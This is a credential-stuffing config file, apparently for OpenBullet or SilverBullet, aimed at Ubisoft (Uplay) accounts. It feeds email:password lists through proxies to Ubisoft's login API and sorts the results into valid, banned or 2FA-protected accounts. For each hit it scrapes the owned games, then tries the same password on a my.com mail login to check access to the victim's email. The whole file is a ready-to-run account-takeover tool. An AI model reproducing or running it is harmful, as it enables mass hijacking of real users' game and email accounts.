[SETTINGS]
{
  "Name": "Uplay",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-26T15:09:22.522464+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Uplay UwU",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "B64Enc" 

REQUEST POST "https://public-ubiservices.ubi.com/v3/profiles/sessions" 
  CONTENT "{\"rememberMe\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.50" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Authorization: Basic <B64Enc>" 
  HEADER "Host: public-ubiservices.ubi.com" 
  HEADER "Origin: https://connect.ubisoft.com" 
  HEADER "Referer: https://connect.ubisoft.com/" 
  HEADER "Ubi-AppId: c5393f10-7ac7-4b4f-90fa-21f8f3451a04" 
  HEADER "Ubi-RequestedPlatformType: uplay" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials" 
    KEY "Authentication forbidden because of suspicious activity" 
  KEYCHAIN Success OR 
    KEY "\"ticket\"" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "<RESPONSECODE>" Contains "409" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "twoFactorAuthenticationTicket\":\"" 

PARSE "<SOURCE>" JSON "ticket" -> VAR "Token" 

PARSE "<SOURCE>" JSON "userId" -> VAR "userId" 

PARSE "<SOURCE>" JSON "sessionId" -> VAR "sessionId" 

REQUEST GET "https://public-ubiservices.ubi.com/v3/profiles/me/2fa" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.50" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Ubi_v1 t=<Token>" 
  HEADER "Host: public-ubiservices.ubi.com" 
  HEADER "Origin: https://account.ubisoft.com" 
  HEADER "Referer: https://account.ubisoft.com/" 
  HEADER "Ubi-AppId: c5393f10-7ac7-4b4f-90fa-21f8f3451a04" 
  HEADER "Ubi-LocaleCode: en-GB" 
  HEADER "Ubi-SessionId: <sessionId>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"active\":true" 

REQUEST GET "https://ubisoftconnect.com/en-GB/games/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.50" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Ubi_v1 t=<Token>" 
  HEADER "Host: public-ubiservices.ubi.com" 
  HEADER "Origin: https://connect.ubisoft.com" 
  HEADER "Referer: https://connect.ubisoft.com/indexOverlay.html?owner=https://club.ubisoft.com" 
  HEADER "Ubi-Appid: c5393f10-7ac7-4b4f-90fa-21f8f3451a04" 
  HEADER "Ubi-LocaleCode: en-US" 

PARSE "<SOURCE>" LR "\"title\":\"" "\"" Recursive=TRUE -> VAR "game" 

PARSE "<SOURCE>" LR "\"platform\":\"" "\"" Recursive=TRUE -> VAR "plat" 

REQUEST GET "https://aj-https.my.com/cgi-bin/auth?ajax_call=1&mmp=mail&simple=1&Login=<USER>&Password=<PASS>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "Ok=" "" -> VAR "resp" 

FUNCTION Translate 
  KEY "1" VALUE "True" 
  KEY "0" VALUE "False" 
  "<resp>" -> VAR "ma" 

FUNCTION Constant " [ Games : <game> - Platforms : <plat> - isMailAccess : <ma> ]" -> CAP "Account-Info" 

